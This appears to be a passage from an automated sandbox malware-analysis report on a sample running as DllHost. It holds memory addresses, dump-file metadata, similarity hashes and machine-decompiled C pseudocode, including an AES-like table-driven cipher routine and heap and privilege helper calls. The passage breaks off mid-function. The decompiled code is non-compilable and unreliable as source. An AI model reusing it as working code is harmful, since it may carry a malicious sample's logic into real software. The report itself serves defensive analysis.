                                                                                                                                                              0x7ff7191db5e8
                                                                                                                                                              0x7ff7191db5ed
                                                                                                                                                              0x7ff7191db5f0
                                                                                                                                                              0x7ff7191db5fa
                                                                                                                                                              0x7ff7191db604
                                                                                                                                                              0x7ff7191db606
                                                                                                                                                              0x7ff7191db609
                                                                                                                                                              0x7ff7191db60b
                                                                                                                                                              0x7ff7191db610
                                                                                                                                                              0x7ff7191db61b
                                                                                                                                                              0x7ff7191db61f
                                                                                                                                                              0x7ff7191db621
                                                                                                                                                              0x7ff7191db629
                                                                                                                                                              0x7ff7191db62e
                                                                                                                                                              0x7ff7191db630
                                                                                                                                                              0x7ff7191db633
                                                                                                                                                              0x7ff7191db638
                                                                                                                                                              0x7ff7191db63f
                                                                                                                                                              0x7ff7191db646
                                                                                                                                                              0x7ff7191db64d
                                                                                                                                                              0x7ff7191db652
                                                                                                                                                              0x7ff7191db657
                                                                                                                                                              0x7ff7191db65f
                                                                                                                                                              0x7ff7191db66b
                                                                                                                                                              0x7ff7191db66e
                                                                                                                                                              0x7ff7191db67b
                                                                                                                                                              0x7ff7191db680
                                                                                                                                                              0x7ff7191db68b
                                                                                                                                                              0x7ff7191db693
                                                                                                                                                              0x7ff7191db698
                                                                                                                                                              0x7ff7191db6a0
                                                                                                                                                              0x7ff7191db6aa
                                                                                                                                                              0x7ff7191db6b3
                                                                                                                                                              0x7ff7191db6b5
                                                                                                                                                              0x7ff7191db6b9
                                                                                                                                                              0x7ff7191db6c0
                                                                                                                                                              0x7ff7191db6c5
                                                                                                                                                              0x7ff7191db6cd
                                                                                                                                                              0x7ff7191db6ed

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID: 0
                                                                                                                                                              • API String ID: 3215553584-4108050209
                                                                                                                                                              • Opcode ID: 3ad2d464b3a428d7903983cff7a9dc1ad2cc08618c101affbb7dd7e7c3808965
                                                                                                                                                              • Instruction ID: 8de6c645a08a034b285482ac134c4d7ebc3ea42a9e108e753c020aa88a548698
                                                                                                                                                              • Opcode Fuzzy Hash: 3ad2d464b3a428d7903983cff7a9dc1ad2cc08618c101affbb7dd7e7c3808965
                                                                                                                                                              • Instruction Fuzzy Hash: CB610511A8CA4646FA686E2970083B9D7F1BF4176CFC40135DD8B47699CE2DE8CFA721
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191EB788 Relevance: 1.4, APIs: 1, Instructions: 137COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E00007FF77FF7191EB788(void* __ecx, void* __edx, void* __rcx, void* __r8, void* __r10, void* __r11, signed long long* _a40) {
				signed int _v72;
				char _v200;
				signed int _v216;
				intOrPtr _v232;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				long long _t14;
				intOrPtr _t41;
				intOrPtr _t45;
				signed long long _t60;
				signed long long _t61;
				signed long long _t62;
				void* _t63;
				long long _t64;
				signed long long _t65;
				signed long long _t85;
				signed long long* _t86;
				void* _t87;
				signed long long _t88;
				void* _t99;

				_t97 = __r11;
				_t60 =  *0x192190a0; // 0x590452ce5669
				_t61 = _t60 ^ _t88;
				_v72 = _t61;
				_t86 = _a40;
				_t45 = r9d;
				_t99 = __r8;
				 *_t86 = _t85;
				if (__edx != 1) goto 0x191eb8a5;
				_v232 = 0x80;
				r8d = _t45;
				_t14 = E00007FF77FF7191EB60C(__ecx, __edx - 1, _t63, __rcx, __r8, _t85, _t86, __r8,  &_v200, __r10, __r11, __rcx);
				_t64 = _t14;
				if (_t14 == 0) goto 0x191eb82d;
				E00007FF77FF7191E7598(_t14, _t64, __r8);
				 *_t86 = _t61;
				E00007FF77FF7191E6B28(_t61, _t64);
				if ( *_t86 == _t85) goto 0x191eb916;
				_t6 = _t64 - 1; // -1
				if (E00007FF77FF7191F4418(_t61, _t64,  *_t86, _t64,  &_v200, _t6) != 0) goto 0x191eb93b;
				goto 0x191eb919;
				if (GetLastError() != 0x7a) goto 0x191eb916;
				r9d = 0;
				_v232 = 0;
				r8d = _t45;
				if (E00007FF77FF7191EB60C(0, GetLastError() - 0x7a, _t64, __rcx, _t99, _t85, _t86,  &_v200, _t6, __r10, _t97, __rcx) == 0) goto 0x191eb916;
				E00007FF77FF7191E7598(_t21, _t21, _t99);
				_t65 = _t61;
				if (_t61 == 0) goto 0x191eb896;
				_v232 = r15d;
				r8d = _t45;
				if (E00007FF77FF7191EB60C(0, _t61, _t65, __rcx, _t99, _t85, _t86,  &_v200, _t61, __r10, _t97, __rcx) == 0) goto 0x191eb896;
				_t62 = _t65;
				 *_t86 = _t62;
				goto 0x191eb899;
				E00007FF77FF7191E6B28(_t62, _t85);
				goto 0x191eb919;
				if (1 != 2) goto 0x191eb8e9;
				r9d = 0;
				r8d = 0;
				if (E00007FF77FF7191E7BB8(_t45, 1 - 2, _t62, _t85, _t99, _t86, _t87,  &_v200) == 0) goto 0x191eb916;
				E00007FF77FF7191E7598(_t26, _t26, _t99);
				if (_t62 == 0) goto 0x191eb896;
				r9d = r15d;
				_t41 = _t45;
				E00007FF77FF7191E7BB8(_t41, _t62, _t62, _t62, _t99, _t86, _t87, _t62);
				goto 0x191eb887;
				if (_t41 != 0) goto 0x191eb916;
				asm("bts ebp, 0x1d");
				_v216 = 0xffffffff;
				r9d = 2;
				if (E00007FF77FF7191E7BB8(_t45, _t41, _t62, _t62, _t99, _t86, _t87,  &_v216) == 0) goto 0x191eb916;
				 *_t86 = _v216;
				goto 0x191eb826;
				return E00007FF77FF7191D23B0(_v216 | 0xffffffff, 0, _v72 ^ _t88);
			}


























                                                                                                                                                              0x7ff7191eb788
                                                                                                                                                              0x7ff7191eb79a
                                                                                                                                                              0x7ff7191eb7a1
                                                                                                                                                              0x7ff7191eb7a4
                                                                                                                                                              0x7ff7191eb7ac
                                                                                                                                                              0x7ff7191eb7b6
                                                                                                                                                              0x7ff7191eb7b9
                                                                                                                                                              0x7ff7191eb7bf
                                                                                                                                                              0x7ff7191eb7c5
                                                                                                                                                              0x7ff7191eb7d0
                                                                                                                                                              0x7ff7191eb7d8
                                                                                                                                                              0x7ff7191eb7de
                                                                                                                                                              0x7ff7191eb7e3
                                                                                                                                                              0x7ff7191eb7e8
                                                                                                                                                              0x7ff7191eb7f0
                                                                                                                                                              0x7ff7191eb7f7
                                                                                                                                                              0x7ff7191eb7fa
                                                                                                                                                              0x7ff7191eb802
                                                                                                                                                              0x7ff7191eb80b
                                                                                                                                                              0x7ff7191eb820
                                                                                                                                                              0x7ff7191eb828
                                                                                                                                                              0x7ff7191eb836
                                                                                                                                                              0x7ff7191eb83c
                                                                                                                                                              0x7ff7191eb83f
                                                                                                                                                              0x7ff7191eb843
                                                                                                                                                              0x7ff7191eb856
                                                                                                                                                              0x7ff7191eb864
                                                                                                                                                              0x7ff7191eb869
                                                                                                                                                              0x7ff7191eb86f
                                                                                                                                                              0x7ff7191eb874
                                                                                                                                                              0x7ff7191eb879
                                                                                                                                                              0x7ff7191eb889
                                                                                                                                                              0x7ff7191eb88b
                                                                                                                                                              0x7ff7191eb891
                                                                                                                                                              0x7ff7191eb894
                                                                                                                                                              0x7ff7191eb89c
                                                                                                                                                              0x7ff7191eb8a3
                                                                                                                                                              0x7ff7191eb8ac
                                                                                                                                                              0x7ff7191eb8ae
                                                                                                                                                              0x7ff7191eb8b1
                                                                                                                                                              0x7ff7191eb8c3
                                                                                                                                                              0x7ff7191eb8ca
                                                                                                                                                              0x7ff7191eb8d5
                                                                                                                                                              0x7ff7191eb8d7
                                                                                                                                                              0x7ff7191eb8dd
                                                                                                                                                              0x7ff7191eb8e2
                                                                                                                                                              0x7ff7191eb8e7
                                                                                                                                                              0x7ff7191eb8eb
                                                                                                                                                              0x7ff7191eb8ed
                                                                                                                                                              0x7ff7191eb8f1
                                                                                                                                                              0x7ff7191eb8fc
                                                                                                                                                              0x7ff7191eb909
                                                                                                                                                              0x7ff7191eb90f
                                                                                                                                                              0x7ff7191eb911
                                                                                                                                                              0x7ff7191eb93a

                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00007FF7191EB82D
                                                                                                                                                                • Part of subcall function 00007FF7191E7598: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7191E5C9D,?,?,8000000000000000,00007FF7191DC85D,?,?,?,?,00007FF7191E6B4D), ref: 00007FF7191E75ED
                                                                                                                                                                • Part of subcall function 00007FF7191E6B28: RtlReleasePrivilege.NTDLL ref: 00007FF7191E6B3E
                                                                                                                                                                • Part of subcall function 00007FF7191F4418: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7191F4446
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateErrorHeapLastPrivilegeRelease_invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 677755227-0
                                                                                                                                                              • Opcode ID: 2c12673c43ee0214e3d7b1fba9c608b863f959af2a5ea1c811352efac8158f60
                                                                                                                                                              • Instruction ID: e8a1040c57d1f3c7cb54900e3cae72a31af054559ae5f8a675ef2b9ce7c662dc
                                                                                                                                                              • Opcode Fuzzy Hash: 2c12673c43ee0214e3d7b1fba9c608b863f959af2a5ea1c811352efac8158f60
                                                                                                                                                              • Instruction Fuzzy Hash: 1B41D721B09A4343FA227E537451679E2F07F857A8FC44535DE4D57785DE3CE48AA230
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191EF270 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF77FF7191EF270(long long __rax) {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x1921be20 = __rax;
				return _t3 & 0xffffff00 | __rax != 0x00000000;
			}




                                                                                                                                                              0x7ff7191ef274
                                                                                                                                                              0x7ff7191ef27d
                                                                                                                                                              0x7ff7191ef28b

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                              • Opcode ID: f82ae498d77c60243d49a6e9b5901d90be03f8b24c2ecd951f5a02b3f4491707
                                                                                                                                                              • Instruction ID: fec634154cfa496c63d1bafec48c1559181a4b4fc4107ebc02ae09ced1e56eeb
                                                                                                                                                              • Opcode Fuzzy Hash: f82ae498d77c60243d49a6e9b5901d90be03f8b24c2ecd951f5a02b3f4491707
                                                                                                                                                              • Instruction Fuzzy Hash: 96B09220E07E0AC2FA483F117C8262862BA7F4C724FC84079C60C40320EF2C20FE6720
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191CAC70 Relevance: .8, Instructions: 850COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF77FF7191CAC70(unsigned int __rax, long long __rbx, unsigned int __rcx, unsigned int __rdx, long long __rdi, long long __rsi, unsigned int __r8, unsigned int __r9, unsigned int __r10, long long __r12, long long __r13, long long __r14, long long __r15) {
				void* _t1328;
				signed long long _t1332;
				unsigned long long _t1333;
				unsigned long long _t1334;
				unsigned long long _t1335;
				unsigned long long _t1336;
				unsigned long long _t1338;
				unsigned long long _t1339;
				unsigned long long _t1340;
				unsigned long long _t1341;
				unsigned long long _t1342;
				unsigned long long _t1343;
				unsigned long long _t1345;
				unsigned long long _t1346;
				unsigned long long _t1347;
				unsigned long long _t1349;
				unsigned long long _t1352;
				unsigned long long _t1353;
				signed long long _t1354;
				unsigned long long _t1355;
				unsigned long long _t1358;
				unsigned long long _t1359;
				signed long long _t1360;
				unsigned long long _t1361;
				unsigned long long _t1364;
				signed long long _t1366;
				unsigned long long _t1367;
				unsigned long long _t1370;
				unsigned long long _t1371;
				unsigned long long _t1372;
				unsigned long long _t1377;
				unsigned long long _t1378;
				signed long long _t1379;
				unsigned long long _t1381;
				unsigned long long _t1382;
				unsigned long long _t1383;
				unsigned long long _t1384;
				unsigned long long _t1385;
				signed int* _t1387;
				void* _t1398;
				void* _t1401;
				signed int* _t1402;
				signed int* _t1410;
				unsigned long long _t1411;
				unsigned long long _t1412;
				void* _t1415;
				signed int _t1418;

				_t1415 = _t1401;
				 *((long long*)(_t1415 + 0x18)) = __r8;
				 *((long long*)(_t1415 + 0x10)) = __rdx;
				_t1402 = _t1401 - 0x40;
				r8d =  *(__r8 + 0xf0) & 0x000000ff;
				if ((__r8 + 0x00000060 & 0x0000009f) != 0) goto 0x191cbbdd;
				_t1328 = r8b;
				if (_t1328 == 0) goto 0x191cbbdd;
				 *((long long*)(_t1415 + 8)) = __rbx;
				 *((long long*)(_t1415 - 0x10)) = __rsi;
				 *((long long*)(_t1415 - 0x18)) = __rdi;
				 *((long long*)(_t1415 - 0x20)) = __r12;
				r12d =  *(__rcx + 0xc);
				r12d = r12d ^  *(__r8 + 0xc);
				 *((long long*)(_t1415 - 0x28)) = __r13;
				r13d =  *(__rcx + 8);
				r13d = r13d ^  *(__r8 + 8);
				 *((long long*)(_t1415 - 0x30)) = __r14;
				r14d =  *(__rcx + 4);
				r14d = r14d ^  *(__r8 + 4);
				 *((long long*)(_t1415 - 0x38)) = __r15;
				r15d =  *__rcx;
				r15d = r15d ^  *__r8;
				 *_t1402 = r15d;
				_t1402[2] = r13d;
				if (_t1328 == 0) goto 0x191cb142;
				if (_t1328 == 0) goto 0x191caf39;
				if (r8d - 0x80 != 0x20) goto 0x191cbba3;
				r10d = r15d;
				r8d =  *(0x7ff7191b0000 + 0x4e440 + __rdx * 4);
				_t1332 = __rax >> 0x18;
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e040 + __rcx * 4);
				r9d = r14d;
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e840 + _t1332 * 4);
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4dc40 + _t1332 * 4);
				r8d = r8d ^  *(__r8 + 0x10);
				r11d = r8d;
				r8d =  *(0x7ff7191b0000 + 0x4e440 + __rdx * 4);
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e040 + __rcx * 4);
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e840 + (__r10 >> 0x18) * 4);
				r12d = r12d >> 8;
				r14d = r14d >> 0x10;
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4dc40 + _t1332 * 4);
				r8d = r8d ^  *(__r8 + 0x14);
				r15d = r15d >> 8;
				r10d =  *(0x7ff7191b0000 + 0x4e440 + __rcx * 4);
				r8d = r13d;
				r10d = r10d ^  *(0x7ff7191b0000 + 0x4e040 + _t1332 * 4);
				r10d = r10d ^  *(0x7ff7191b0000 + 0x4e840 + (__r9 >> 0x18) * 4);
				r10d = r10d ^  *(0x7ff7191b0000 + 0x4dc40 + _t1332 * 4);
				r15d =  *(0x7ff7191b0000 + 0x4dc40 + __rcx * 4);
				r10d = r10d ^  *(__r8 + 0x18);
				_t1333 = _t1332 >> 0x18;
				r8d =  *(0x7ff7191b0000 + 0x4e040 + __rcx * 4) ^  *(0x7ff7191b0000 + 0x4e440 + _t1332 * 4) ^  *(0x7ff7191b0000 + 0x4e840 + (__r8 >> 0x18) * 4) ^  *(0x7ff7191b0000 + 0x4dc40 + _t1332 * 4) ^  *(__r8 + 0x1c);
				_t1381 = __rdx >> 0x18;
				r15d = r15d ^  *(0x7ff7191b0000 + 0x4e840 + _t1333 * 4);
				r14d =  *(0x7ff7191b0000 + 0x4e840 + _t1381 * 4);
				r15d = r15d ^  *(0x7ff7191b0000 + 0x4e440 + __rcx * 4);
				r15d = r15d ^  *(0x7ff7191b0000 + 0x4e040 + __rcx * 4);
				r15d = r15d ^  *(__r8 + 0x20);
				 *_t1402 = r15d;
				r14d = r14d ^  *(0x7ff7191b0000 + 0x4e440 + __rcx * 4);
				r14d = r14d ^  *(0x7ff7191b0000 + 0x4e040 + __rcx * 4);
				r14d = r14d ^  *(0x7ff7191b0000 + 0x4dc40 + _t1333 * 4);
				r14d = r14d ^  *(__r8 + 0x24);
				r13d =  *(0x7ff7191b0000 + 0x4e440 + _t1381 * 4);
				r13d = r13d ^  *(0x7ff7191b0000 + 0x4e040 + __rcx * 4);
				r13d = r13d ^  *(0x7ff7191b0000 + 0x4dc40 + _t1333 * 4);
				_t1334 = _t1333 >> 0x18;
				r13d = r13d ^  *(0x7ff7191b0000 + 0x4e840 + _t1334 * 4);
				r13d = r13d ^  *(__r8 + 0x28);
				r12d =  *(0x7ff7191b0000 + 0x4e040 + __rcx * 4);
				_t1402[2] = r13d;
				r12d = r12d ^  *(0x7ff7191b0000 + 0x4dc40 + _t1334 * 4);
				_t1335 = _t1334 >> 0x18;
				r12d = r12d ^  *(0x7ff7191b0000 + 0x4e840 + _t1335 * 4);
				r12d = r12d ^  *(0x7ff7191b0000 + 0x4e440 + _t1335 * 4);
				r12d = r12d ^  *(__r8 + 0x2c);
				_t1398 = __r8 + 0x20;
				_t1410 = _t1398 + 0x20;
				_t1336 = _t1335 >> 0x18;
				r9d =  *(0x7ff7191b0000 + 0x4dc40 + __rcx * 4) ^  *(0x7ff7191b0000 + 0x4e840 + _t1336 * 4) ^  *(0x7ff7191b0000 + 0x4e440 + __rcx * 4) ^  *(0x7ff7191b0000 + 0x4e040 + __rcx * 4) ^  *(_t1398 + 0x10);
				r11d =  *(0x7ff7191b0000 + 0x4dc40 + _t1381 * 4);
				_t1338 = _t1336 >> 0x18 >> 0x18;
				r14d = r14d >> 0x10;
				r11d = r11d ^  *(0x7ff7191b0000 + 0x4e040 + __rcx * 4);
				r11d = r11d ^  *(0x7ff7191b0000 + 0x4e840 + _t1338 * 4);
				r15d = r15d >> 8;
				_t1339 = _t1338 >> 0x18;
				r11d = r11d ^  *(0x7ff7191b0000 + 0x4e440 + __rcx * 4);
				r11d = r11d ^  *(_t1398 + 0x18);
				r8d =  *(0x7ff7191b0000 + 0x4dc40 + __rcx * 4) ^  *(0x7ff7191b0000 + 0x4e840 + _t1339 * 4) ^  *(0x7ff7191b0000 + 0x4e440 + _t1339 * 4) ^  *(0x7ff7191b0000 + 0x4e040 + _t1339 * 4) ^  *(_t1398 + 0x1c);
				_t1382 = _t1381 >> 0x18;
				r15d =  *(0x7ff7191b0000 + 0x4e840 + _t1382 * 4);
				r15d = r15d ^  *(0x7ff7191b0000 + 0x4e440 + __rcx * 4);
				r15d = r15d ^  *(0x7ff7191b0000 + 0x4e040 + __rcx * 4);
				r15d = r15d ^  *(0x7ff7191b0000 + 0x4dc40 + _t1339 * 4);
				r15d = r15d ^  *_t1410;
				 *_t1402 = r15d;
				r14d =  *(0x7ff7191b0000 + 0x4e440 + _t1382 * 4);
				r14d = r14d ^  *(0x7ff7191b0000 + 0x4e040 + __rcx * 4);
				r14d = r14d ^  *(0x7ff7191b0000 + 0x4dc40 + _t1339 * 4);
				_t1340 = _t1339 >> 0x18;
				_t1402[0x18] = _t1410;
				r14d = r14d ^  *(0x7ff7191b0000 + 0x4e840 + _t1340 * 4);
				r14d = r14d ^  *(_t1398 + 0x24);
				r13d =  *(0x7ff7191b0000 + 0x4e040 + __rcx * 4);
				r13d = r13d ^  *(0x7ff7191b0000 + 0x4dc40 + _t1340 * 4);
				_t1341 = _t1340 >> 0x18;
				r13d = r13d ^  *(0x7ff7191b0000 + 0x4e840 + _t1341 * 4);
				_t1342 = _t1341 >> 0x18;
				r13d = r13d ^  *(0x7ff7191b0000 + 0x4e440 + __rcx * 4);
				r13d = r13d ^  *(_t1398 + 0x28);
				_t1402[2] = r13d;
				r12d =  *(0x7ff7191b0000 + 0x4dc40 + __rcx * 4);
				r12d = r12d ^  *(0x7ff7191b0000 + 0x4e840 + _t1342 * 4);
				r12d = r12d ^  *(0x7ff7191b0000 + 0x4e440 + _t1342 * 4);
				r12d = r12d ^  *(0x7ff7191b0000 + 0x4e040 + _t1342 * 4);
				r12d = r12d ^  *(_t1398 + 0x2c);
				_t1411 = _t1402[0x18];
				_t1343 = _t1342 >> 0x18;
				r9d =  *(0x7ff7191b0000 + 0x4dc40 + __rcx * 4) ^  *(0x7ff7191b0000 + 0x4e840 + _t1343 * 4) ^  *(0x7ff7191b0000 + 0x4e440 + __rcx * 4) ^  *(0x7ff7191b0000 + 0x4e040 + __rcx * 4) ^ _t1410[4];
				r8d =  *(0x7ff7191b0000 + 0x4dc40 + _t1382 * 4);
				_t1345 = _t1343 >> 0x18 >> 0x18;
				r14d = r14d >> 0x10;
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e040 + __rcx * 4);
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e840 + _t1345 * 4);
				_t1346 = _t1345 >> 0x18;
				r15d = r15d >> 8;
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e440 + __rcx * 4);
				r8d = r8d ^  *(_t1411 + 0x18);
				r11d = r8d;
				_t1418 = _t1402[0x18];
				r10d =  *(0x7ff7191b0000 + 0x4dc40 + __rcx * 4);
				r10d = r10d ^  *(0x7ff7191b0000 + 0x4e840 + _t1346 * 4);
				r10d = r10d ^  *(0x7ff7191b0000 + 0x4e440 + _t1346 * 4);
				r10d = r10d ^  *(0x7ff7191b0000 + 0x4e040 + _t1346 * 4);
				r10d = r10d ^  *(_t1418 + 0x1c);
				r8d =  *(0x7ff7191b0000 + 0x4e440 + _t1382 * 4);
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e040 + __rcx * 4);
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4dc40 + _t1346 * 4);
				_t1347 = _t1346 >> 0x18;
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e840 + _t1347 * 4);
				r8d = r8d ^  *(_t1418 + 0x20);
				r14d = r8d;
				_t1349 = _t1347 >> 0x18 >> 0x18;
				_t1377 = __rcx >> 0x18;
				r9d =  *(0x7ff7191b0000 + 0x4e840 + _t1377 * 4) ^  *(0x7ff7191b0000 + 0x4e440 + _t1349 * 4) ^  *(0x7ff7191b0000 + 0x4e040 + _t1349 * 4) ^  *(0x7ff7191b0000 + 0x4dc40 + _t1349 * 4) ^  *(_t1418 + 0x2c);
				r8d =  *(0x7ff7191b0000 + 0x4dc40 + _t1382 * 4);
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e040 + _t1377 * 4);
				_t1352 = _t1349 >> 0x18 >> 0x18 >> 0x18;
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e440 + _t1377 * 4);
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e840 + _t1352 * 4);
				r8d = r8d ^  *(_t1418 + 0x38);
				r11d = r8d;
				_t1378 = _t1377 >> 0x18;
				r14d = r14d >> 8;
				r9d =  *(0x7ff7191b0000 + 0x4e840 + _t1378 * 4) ^  *(0x7ff7191b0000 + 0x4dc40 + _t1352 * 4) ^  *(0x7ff7191b0000 + 0x4e040 + _t1352 * 4) ^  *(0x7ff7191b0000 + 0x4e440 + _t1352 * 4) ^  *(_t1418 + 0x3c);
				r14d =  *(0x7ff7191b0000 + 0x4e040 + _t1378 * 4);
				r14d = r14d ^  *(0x7ff7191b0000 + 0x4dc40 + _t1352 * 4);
				_t1353 = _t1352 >> 0x18;
				r14d = r14d ^  *(0x7ff7191b0000 + 0x4e840 + _t1353 * 4);
				_t1354 = _t1353 >> 0x18;
				r14d = r14d ^  *(0x7ff7191b0000 + 0x4e440 + _t1378 * 4);
				r14d = r14d ^  *(_t1418 + 0x40);
				_t1383 = _t1382 >> 0x18;
				r8d =  *(0x7ff7191b0000 + 0x4e840 + _t1383 * 4);
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e440 + _t1378 * 4);
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e040 + _t1378 * 4);
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4dc40 + _t1354 * 4);
				r8d = r8d ^  *(_t1418 + 0x48);
				r10d = r8d;
				_t1355 = _t1354 >> 0x18;
				r9d =  *(0x7ff7191b0000 + 0x4e440 + _t1378 * 4) ^  *(0x7ff7191b0000 + 0x4e040 + _t1354 * 4) ^  *(0x7ff7191b0000 + 0x4dc40 + _t1354 * 4) ^  *(0x7ff7191b0000 + 0x4e840 + _t1355 * 4) ^  *(_t1418 + 0x4c);
				r8d =  *(0x7ff7191b0000 + 0x4dc40 + _t1383 * 4);
				_t1412 = _t1411 >> 0x18;
				r14d = r14d >> 8;
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e040 + _t1378 * 4);
				_t1358 = _t1355 >> 0x18 >> 0x18 >> 0x18;
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e440 + _t1378 * 4);
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e840 + _t1358 * 4);
				r8d = r8d ^  *(_t1418 + 0x58);
				r11d = r8d;
				r9d =  *(0x7ff7191b0000 + 0x4e840 + _t1412 * 4) ^  *(0x7ff7191b0000 + 0x4dc40 + _t1358 * 4) ^  *(0x7ff7191b0000 + 0x4e040 + _t1358 * 4) ^  *(0x7ff7191b0000 + 0x4e440 + _t1358 * 4) ^  *(_t1418 + 0x5c);
				r14d =  *(0x7ff7191b0000 + 0x4e040 + _t1378 * 4);
				r14d = r14d ^  *(0x7ff7191b0000 + 0x4dc40 + _t1358 * 4);
				_t1359 = _t1358 >> 0x18;
				r14d = r14d ^  *(0x7ff7191b0000 + 0x4e840 + _t1359 * 4);
				_t1360 = _t1359 >> 0x18;
				r14d = r14d ^  *(0x7ff7191b0000 + 0x4e440 + _t1378 * 4);
				r14d = r14d ^  *(_t1418 + 0x60);
				_t1384 = _t1383 >> 0x18;
				r8d =  *(0x7ff7191b0000 + 0x4e840 + _t1384 * 4);
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e440 + _t1378 * 4);
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e040 + _t1378 * 4);
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4dc40 + _t1360 * 4);
				r8d = r8d ^  *(_t1418 + 0x68);
				r10d = r8d;
				_t1361 = _t1360 >> 0x18;
				r9d =  *(0x7ff7191b0000 + 0x4e440 + _t1378 * 4) ^  *(0x7ff7191b0000 + 0x4e040 + _t1360 * 4) ^  *(0x7ff7191b0000 + 0x4dc40 + _t1360 * 4) ^  *(0x7ff7191b0000 + 0x4e840 + _t1361 * 4) ^  *(_t1418 + 0x6c);
				r8d =  *(0x7ff7191b0000 + 0x4dc40 + _t1384 * 4);
				r14d = r14d >> 8;
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e040 + _t1378 * 4);
				_t1364 = _t1361 >> 0x18 >> 0x18 >> 0x18;
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e440 + _t1378 * 4);
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e840 + _t1364 * 4);
				r8d = r8d ^  *(_t1418 + 0x78);
				r11d = r8d;
